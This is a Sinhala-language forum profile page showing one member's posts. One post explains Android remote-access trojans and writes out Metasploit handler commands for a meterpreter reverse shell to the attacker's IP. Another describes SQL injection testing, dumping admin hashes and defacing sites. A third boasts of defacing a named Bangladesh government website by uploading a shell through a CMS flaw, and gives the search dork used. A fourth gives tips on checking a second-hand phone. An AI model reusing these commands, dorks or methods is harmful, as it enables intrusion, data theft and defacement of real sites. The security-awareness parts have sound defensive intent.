• SFC
    SFC
    ගොඩ දෙනෙක් මේ ගැන දැනුවත් නෑ කියල හිතුන නිසා මේක දාන්න හිතුවෙ
    දැනුවත් අයත් ඇති
    විවේචනය කිරීම ඔබේ අයිතියක්..
    :-) හොද විවේචන බලාපොරොත්තු වෙනවා

    හරි මුලින් බලමු hacker කෙනෙක්ට මේක කරන්න පුලුවන් ක්‍රමවේද ගැන

    මේක කරන්න hacker කෙනෙක් සාමාන්‍යයෙන් බාවිතා කරන්නේ rat එකක් ඒ කියන්නේ ( Remote administration tool ) එකක් උදාහරණයක් විදිහට අපි android මෙහෙයුම් පද්දතියෙන් දාවනය වන device එකක් ගමු. මෙතනදී හැකර් android මෙහෙයුම් පද්දතියට අදාල වන ලෙස Rat එක සාදා ගනු ලබනවා මෙහිදී ඔහු ඔහුගේ ip ලිපිනය හා සම්බන්ද විය යුතු port එක එම Rat එකට අඩන්ගු කරනවා.
    ඊට පස්සෙ කරන්නේ මේක victime ගෙ අතට පත් කරන එක. මේක android වලට සීමා උන දෙයක් පමනක් නෙවෙයි windows. Apple ඕනේම platform එකකට සිදු කරන්න හැකියාවක් තියනවා. ඉතින් දැන් අපි victime කෙනෙක් උනා කියල හිතමු අපි මේ Rat එක ස්තාපනය කරගත් සැනින් hacker ට අපේ ජන්ගම දුරකතනය පාලනය කරන්න හැකියාවක් ලැබෙනවා මෙය සිදු කරන්න පුලුවන් අපි අන්තර්ජාලයට සම්බන්ද වූ විට පමනයි . අපි ස්තාපනය කරගත් Rat එක අපි අන්තර්ජාලයට සම්බන්ද වූ සැනිනි hacker ඇතුලත් කරන ලද ip ලිපිනයට හා port එකට සම්බන්ද (connect ) වීමට උත්සාහ කරනවා .ඉතුරු ටික තියෙන්නේ හැකර්ගෙ අතේ.

    ඔහුට ඔබගේ දුරකතනයට සම්බන්ද වීමට අවශ්‍ය වන්නේ line 6 ක පුන්චි code එකක් පමනයි metasploit නම්

    Use multi/handler
    Set payload android/meterpreter/reverse_tcp
    Set LHOST හැකර්ගෙ IP ලිපිනය
    Set LPORT port එක

    exploit
    දැන් බලමු හැකර්ට කරන්න පුලුවන් දේවල් ගැන
    ඔහුට ඔබේ
    Message කියවන්න
    Contact list එකට acess වෙන්න
    Camera ව පාලනය කරන්න
    ඔයාගේ දුරකතනයෙන් messages යවන්න තව ගොඩක් දේවල් කරන්න පුලුවන්.
    හරි දැන් බලමු කොහොමද මේ වාගෙ දේවලින් වැලකෙන්නේ කියලා
    හරි අපි උදාහරණයක් විදිහට android device එකක් ගමු සෑම app එකක්ම ස්තාපනය කිරීමේදී එයට අවශ්‍ය වෙන permissions ගැන සැලකිලිමත් විය යුතුයි. මේ ක්‍රමය ගොඩක් සාර්තක නෑ මොකද හැකර් කෙනෙකුට අවශ්‍ය පරදි මේ permissions වෙනස් කරන්න පුලුවන්

    අනිත් දෙය හැකි සෑම විටම අපිට අවශ්‍ය app එක playstore. AppStore වගේ දෙයකින් බාගත් කරගන්න සැලකිලිමත් වෙන්න ඕනේ
    Hacker කෙනෙකුට මෙම rat එක ඕනෑම තවත් app එකකට bind කිරීමට අවශ්‍ය වන්නේ සරල ruby script එකක් පමනයි ඒ නිසා අපි සෑම විටම app ලබාගැනීමට එම app නිර්මානය කල අයගේ web අඩවිය හෝ playstore වැනි දේ බාවිත කල හොත් අපිට මෙවැනි දේ වලින් වැලකිය හැකියි

    - කරුනාකර කතු අයිතිය සුරකින්න -
    Chandidhanushkamadhawa_hToRaChathinduSLQQ1
  • SFC
    SFC
    Mulinma device eke imei number eka hardware walinui software walinui dekenma ekamada kiyala balanna
    Apple wala activation lock kiyala option ekk thiynwa eken puluwan device eka horakan karapu ekakda kiyala houaganna e gana poddk balanna. Mkda 4n eka horakan karalanm activation lock on nam oyta mukuthma karaganna bari venawa 4n eken ehma venne original user eyage apple id eka link karala thiyana nisa. Anith de 4n eka godak rath wenawada kiyna eka apple samanyen rath wenwa godakma rath wenawanm 4n eke short ekak thiyenna puluwan ekath balanna. Thawa imei eka backlist welada kiyalath balanna online services thiynwa check karanna .anthimatama ithin 4n eke parana data okkoma erase karala daanna oya 4n eka gaththanm echchra thamai mn dnna tharamin nm balanna thiyenne :-)
    ChandiChathinduSL
  • SFC
    SFC
    මගේ බාශාවෙන් නම් Sql vulnerability කියන්නේ sql database එකක තියන වැරද්දක් ..
    එතකොට sqli (sql injection) කියන්නේ ඒ වැරැද්ද පාවිච්චි කරල database එකේ අන්තර්ගතය dump කිරීම (ලබා ගැනීම) මේක වෙබ් site එකක තියනවා කියන්නේ attacker කෙනෙකුට පහසුවෙන් ඒ website එක down කරන්න පුලුවන්. මේක අපිට හොයාගන්න පුලුවන් ගොඩක් සරල ක්‍රමයකින් උදාහරණයක් විදිහට මේ ලින්ක් එක ගන්නකො
    www.examplesite.lk/example/php?id=9
    මේ ලින්ක් එක අගට ' add කලාම sql error එකක් එනවනම් ඒ වෙබ්site එකේ sqli vulnerability එක තියනවා
    www.examplesite.lk/example/php?id=9'
    ඕක තමයි testing method එක
    අපි හිතමු ඕකෙ table තියනවා admin කියලයි password කියලයි ඒ කියන්නෙ ඉතින් admin login details .. හැබයි ඔය password .hash encrypt කරලා තියෙන්නේ Md5 ,NTLM වගේ ඒ Password hashes decrypt කරපු ගමන් අපිට admin panel එකෙන් ලොග් වෙන්න පුලුවන්.. ඉතුරු ටික ලොග් වෙන කෙනා අතේ තියෙන්නේ...index වෙනස් කලොත් deface කලා .. database එකේ data ටික ගත්තොත් data leak කලා කියනවා.. මොනවා කලත් අන්තිමට අහු වෙනවා.. හික්ස්... ඔන්න ඕකයි මගෙ බාශාවෙන් sql vulnerability හා sqli කියන්නේ.
    Charith9422
  • SFC
    SFC
    me thiyenne bangaladesh government site ekak, esoft cms eke vuln ekak use karala shell ekak up karala defaced kala

    mekata paavichchi kale sarala php script ekak
    rajaye unath aarakshaava athin godak durwalayi


    mekata paavichchi karapu dork eka

    -----------------------------------

    inurl : esoft-cms

    -----------------------------------

    >> http://www.fima.gov.bd/ visit :-)




    image
    coolheartShan_Rox_
SFC
SFC
එක්වූයේ
පැමිණීම්
118
අවසන් පැමිණීම
තත්වය
Member
Points
93
Badges
10
Birthday
May 9, 1997

තාමත් එකතු වුනේ නැද්ද....??

▪ අලුත් විදිහට ලෝකය දකින.......................!

▪ අලුත් දේවල් කරන්න සිහින දකින...............!

▪ ඔබ වෙනුවෙන්ම නිර්මානය කල, ඔබගේම ෆොරමය, එකතුව.org

▪ ඉතින් දැන්ම එකතු වෙන්න, එකතුවත් එක්ක.

Sign In with Facebook Sign In with GooglePlus Sign In with OpenID Sign In with Twitter

Badges

Advertisement

© Copyright 2016 - ekathuwa.org | Powered By Max Web Solutions